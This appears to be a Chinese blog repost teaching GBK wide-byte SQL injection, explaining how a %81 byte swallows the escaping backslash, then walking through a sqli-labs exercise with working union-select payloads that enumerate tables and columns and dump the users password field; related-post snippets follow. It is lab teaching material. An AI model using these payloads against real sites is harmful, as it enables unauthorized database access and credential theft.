SQL宽字节注入

最新推荐文章于 2024-12-27 21:22:51 发布
最新推荐文章于 2024-12-27 21:22:51 发布
阅读量246 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 数据库
原文链接:http://www.cnblogs.com/ldhbetter/p/9201810.html
本文详细解析了宽字节注入的原理,展示了如何利用gbk编码特性绕过常见过滤函数,通过实例演示了在sqli-lab环境中进行宽字节注入攻击的过程,包括构造SQL语句、获取数据库信息等关键步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x00 概述

- 什么是宽字节注入?

宽字节注入就是因为gbk编码方式需要两个ascii码组合来解码,所以形象的叫做宽字节,这个作为了解即可

 

-宽字节注入的条件

1) 数据库查询设置为GBK编码

2) 使用了addslashes(),mysql_real_escape_string(),mysql_escape_string()这类的过滤函数

 

- 宽字节注入的原理

假设我们传递一个参数id=1’,当我们输入这个单引号的时候,那么会被认为是非法的字符,会被过滤函数添加“/”给过滤掉,所以我们想要程序接受我们传递的参数里面包含单引号,那么就需要把这个转义字符“/”给干掉,那如何才能干掉?当http协议传输的时候,要经过url编码的,如果这个编码完成后,传递到服务器时,有奇数个数,它会把前面偶数个数的字符当作gbk编码去解码,那么剩下的就当作普通的url去编码,所以我们就可以在单引号之前添加一个%81这样的编码,这样当最后解码的时候,这个%81就会和“/”对应的编码相结合按照gbk的要求去解码,最后就只剩下个单引号,也就得到了我们想要的结果!

0x01 利用sqli-lab的实验环境实现宽字节注入

下载传送门: https://github.com/Audi-1/sqli-labs

0x02 实战演练

1、首先观察正常访问的页面

 

 

 

2、给参数1后面添加一个单引号,观察页面变化:可以看到单引号前面多了一个\的转义字符,那么可以判断后台在处理参数的时候使用了过滤函数进行转义过滤

 

 

3、根据之前原理的分析,利用gbk编码的特性来试一下,在‘前面增加一个%81的编码

 

 

4、上一步好像那样做过后也没看出什么异常,只是多了一个不认识的符号,这应该是和浏览器页面的编码方式有关,由于我利用的是gbk编码的特性,所以我把页面的编码改成gbk再来看看效果

 

 

 

 

那么其实更改编码过后,之前的转义符其实就是和%81结合按照gbk的解码方式变成了一个汉字,所以我们输入的单引号就得以逃过过滤函数的转义

 

5、那么弄明白上面的问题过后,就可以开始一步步的去构造sql语句去查询数据库里面的信息了,在这里选择通过结合union联合查询来注入

1)由于联合查询需要满足列相同,以及类型相似,所以需要先判断一下

 

构造的sql语句1%81' union select 1--+

 

 

 

报了列不匹配的错误,那么继续增加,直到不报错为止如下:

 

当sql语句:1%81' union select 1,3,2--+ 时就没有报错了,说明列匹配了

 

 

3)注入得到数据库名字:security

 

构造的sql语句:%81' union select 1,user(),database()--+

 

 

4得到数据库里面的表名:emails,referers,uagents,users

 

构造的sql语句:%81' union select 1,group_concat(table_name),database() from information_schema.tables where table_schema=database()--+

 

 

5)得到数据库的表里面的列名,这里以user来演示

构造的sql语句:%81' union select 1,group_concat(column_name),database() from information_schema.columns where table_name='user'--+

 

当我这样做的时候,发现报错了,我的table_name的参数使用了引号,那这里的这个引号如何处理呢?我尝试了一下,利用前面的方法不行,所以这里就只能将user进行16进制转码来解决,也就是将‘user’使用0x 75736572来代替;75736572对应的就是user

更改后的sql语句:最后我又添加了一个数据库名的条件,因为只要那个数据库里的users的字段

%81' union select 1,group_concat(column_name),1 from information_schema.columns where table_name=0x7573657273 and table_schema=0x7365637572697479--+

 

 

最后得到的列名就是:id,username,password

 

6)得到数据库名,得到表名字和列名字,那么再继续得到数据的内容就跟容易了,如下:

 

构造的sql语句:%81' union select 1,group_concat(password),1 from users--+

 

 

 

最后成功得到users表里面的PASSWORD字段的数据如下

Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

 

 

转载于:https://www.cnblogs.com/ldhbetter/p/9201810.html

dda6607
关注
mysql 南邮ctf_宽字节注入和防御(示例代码)
weixin_42282482的博客
02-07 364
0、前言最近要为了自动化审计搜集所有PHP漏洞,在整理注入的时候,发现宽字节注入中使用iconv造成的漏洞原理没有真正搞懂,网上的文章也说得不是很清楚,于是看了荣哥(lxsec)以前发的一篇http://www.91ri.org/8611.html,加上我们两个人的讨论,最终有了这一篇深入的研究成果。1、概述主要是由于使用了宽字节编码造成的。什么是字符集?计算机显示的字符图形与保存该字符时的二进制...
sql注入宽字节注入
m0_52484587的博客
07-11 1121
str:需要添加反斜线的字符串。
(学习)SQL注入--宽字节注入
Huang921的博客
11-21 3935
SQL注入宽字节注入实践
(手工)【sqli-labs35】宽字节、数字型、编码、报错注入
07-14 844
SQL-宽字节、编码、数字型注入
sqli-宽字节注入
weixin_47346400的博客
03-16 212
以下ppt来自大佬传送门 宽字节注入原理 初步探测: http://sqli-labs:65/Less-32/?id=1'-- 发现1’被转义为 ''所以判定为 宽字节注入 方法:在注入点后键入%df,然后按照正常的注入流程开始注入 原理:下图中的hint == -1�’ union select 1,2,(select user())-- ==、由于和源代码中的 ‘$id’产生闭合,所以就自然执行了 union select… 已知mysql注入的类型是宽字节了,下面就按照注入的基本
宽字节注入
aaartemis的博客
12-30 228
宽字节注入 原理 利用mysql特性, 在使用GBK编码时将/进行转义 ASCII码传输中文是会变成字符串: utf-8, GBK(宽字节注入, 默认两个字节为一个汉字) URL 转码 十六进制形式 空格 %20 ’ %27 # %23 \ %5C 如何从addslashes函数中逃逸 addslashes - 在GBK编码中, 会使用addslashes函数(在传入值中插入“/”以转义)...
SQL注入实战:宽字节注入
ting_liang的博客
01-21 1181
2、数据库使用的是GBK编码,PHP编码为UTF8就可能出现宽字节注入,原因是为了防止发生SQL注入,会调用上面所介绍的几种函数,将单引号或双引号转义操作,在单或双引号前加斜杠(\)。1、%DF':会被PHP当中的addslashes函数转义为“%DF\’",\在URL里是“%5C”,那么也就是说,“%DF'"会被转成“%DF%5C%27,倘若网站的字符集是GBK,MYSOL使用的编码也是GBK的话,就会认为“%DF%5C%27"是一个宽字符。addslashes()函数。二、php中的宽字节
13.SQL注入-宽字节
愿听风成曲
07-07 678
MySQL是用的PHP语言,然后PHP有addslashes()等函数,这类函数会自动过滤 ’ ‘’ null 等这些敏感字符,将它们转义成’ ‘’ \null;然后宽字节字符集比如GBK它会自动把两个字节的字符识别为一个汉字,所以我们在单引号前面加一个%df,从而使单引号逃逸。宽字节注入条件有两个:1.数据库编码设置成GB系列这里说的GB系列编码,不是指PHP页面的编码,而是连接数据库使用的编码。
SQL注入宽字节注入
qq_68163788的博客
01-31 3420
宽字节注入中,攻击者利用数据库编码中的特性,通常是双字节字符编码(如GB2312、GBK等),来绕过应用程序对输入进行的过滤。攻击者可以通过在输入中插入特定的编码字符来修改SQL查询的语义,从而执行恶意操作。这种技术通常用于绕过应用程序对单字节字符的过滤,使得攻击者能够成功注入恶意SQL代码。 举个例子,假设应用程序在处理用户输入时没有正确过滤并且使用了双字节字符编码。攻击者可以在输入中插入特定的双字节字符,使得SQL查询被修改,从而绕过认证、获取敏感数据或者修改数据库内容。
【新手入门】SQL注入宽字节注入
最新发布
2401_89344791的博客
12-27 1658
说到宽字节注入,我们首先要了解一下编码,那么都有哪些编码呢?url编码、ascii码、gbk和utf8编码。ASCII码使用7位二进制数表示128个字符,包括英文字母、数字、标点符号、控制字符等。,不支持中文。URL 是一个字符序列,由数字、字母和特殊字符组成。
渗透测试-SQL注入-查询漏洞
fjc0214的博客
12-05 534
数据类型不同,在注入的payload中会有大小不同,主要考察对字符语法规则的理解和注释符的运用。
dvwa靶场,2024年最新网络安全最新实习面试经验总结
2401_83974590的博客
04-13 1064
password_new=987654&password_conf=987654&Change=Change#,并进行抓包,可以发现没有referer,需要进行伪造,Referer: http://127.0.0.1/DVWA/vulnerabilities/csrf/ ,然后放包,即可。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。薪资区间6k-15k。
DVWA-SQL 详细教学
cc菜的一批
12-05 4631
一、SQL注入原理 利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,这是SQL注入的标准释义。 二、手工注入思想流程 1、判断是否存在注入点 2、是数字型注入,还是字符型注入 3、判断字段数 4、判断回显位置 5、获取数据库名 6、获取表名 7、获取字段名 8、得到数据 三、开始手工sql注入 难度等级 注入方式 提交方式 low 字符型 get 尝试输...
mysql 刚才一条_记一次MySQL手工注入
weixin_34236672的博客
01-19 122
本来想找个装安全狗的站试下绕过,safe dog没找到,但随便一搜搜到一个小站有SQLi,正好借此机会复习下手工注入(新版Firefox我吐槽一下,hackbar这么好用的工具,说阉割就阉割,哎)小站没有上WAF,用1=1、1=2就可以检测注入点,就不放截图了。然后order by 、联合查询什么的也都是基本操作。。直接进入最关键的手工爆表好了。(已知第二列和第三列有回显,MySQL versio...
SQL注入教程——(四)宽字节注入
热门推荐
hijack89的博客
07-27 2万+
前言在mysql中,用于转义(即在字符串中的符号前加上”\”)的函数有addslashes,mysql_real_escape_string,mysql_escape_string等,还有一种情况是magic_quote_gpc,不过高版本的PHP将去除这个特性。涉及到的基本概念 字符、字符集 字符(character)是组成字符集(character set)的基本单位。对字符赋予一个数值(en
宽字节注入讲解
Web安全工具库
09-09 5280
我讨厌现在的自己,一边压抑着自己的情绪,一边装作没事的样子,一到深夜就彻底崩溃了,天亮后还要微笑面对生活。。。 ---- 网易云热评 一、原理 1、单字节字符集: 所有的字符都使用一个字节来表示,比如 ASCII 编码(0-127) 2、多字节字符集: 在多字节字符集中,一部分字节用多个字节来表示,另一部分(可能没有)用单个字节来表示。 3、宽字节注入是利用mysql的一个特性,使用GBK编码的时候,会认为两个字符是一个汉字 二、addslashes()函数 1、addslashes(..
CTF/CTF练习平台 --SQL注入测试【sql宽字节注入与#,#】
Sp4rkW的博客
08-19 1万+
原题内容: http://103.238.227.13:10083/ 这题其实就是考验sql注入基本功,写个wp记录下自己的几个失误点,与大家共同学习 首先,打开页面可见 题目提示的很明显了,这是一个注入题,我们肯定得找到注入点,一般的思路都是'闭合导致注入,关键是找到什么数据被传入了数据库,才能确定注入点 按照常规思路,习惯性加上一个index.php,...
sqli-lab通关笔记
SYJ_361的博客
12-15 4527
sqli-lab通关笔记前6关 Less-1–基于单引号的字符型注入 配置信息 ​ 在Lsee-1目录下的index.php中配置 echo $sql; echo "<br>"; 用于在网页显示sql语句 初始界面 上面提示: Please input the ID as parameter with numeric value 意思是我们应该输入一个ID信息 输入ID后的界面 首先,按F12–【hackbar】 然后,Load加载网页地址到URL上 在URL上输入【 ?id=1
sql注入宽字节注入
07-28
SQL注入宽字节注入都是常见的安全漏洞类型。下面我将简要介绍这两种注入方式。 1. SQL注入SQL注入是一种在应用程序中利用不正确处理用户输入的漏洞,攻击者可以通过在用户输入中插入恶意的SQL代码来执行非授权的数据库操作。这可能导致数据泄露、数据篡改、绕过认证、获取系统权限等问题。 预防SQL注入的措施包括: - 使用参数化查询或预编译语句来处理数据库查询,而不是直接拼接用户输入的数据。 - 对用户输入进行严格的验证和过滤,避免将未经处理的输入直接传递给数据库查询。 - 最小化数据库用户的权限,并且仅分配最低必要的权限。 2. 宽字节注入宽字节注入是一种特定于某些数据库和编码方式的注入攻击方法。它利用了某些编码方式对特殊字符的处理不当,从而绕过了应用程序对输入进行过滤和验证的机制。攻击者可以通过插入宽字节字符来篡改SQL语句或绕过认证。 预防宽字节注入的措施包括: - 使用合适的编码方式,例如UTF-8,以避免特殊字符被误解释。 - 进行输入验证和过滤,确保特殊字符被正确处理,不会导致SQL语句的非预期解析。 - 定期更新数据库和应用程序框架,以修复已知的宽字节注入漏洞。 总的来说,要防止SQL注入宽字节注入等安全漏洞,应该采取综合性的安全措施,包括输入验证、参数化查询、最小权限原则、使用最新版本的软件以及定期进行安全审计和漏洞扫描。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值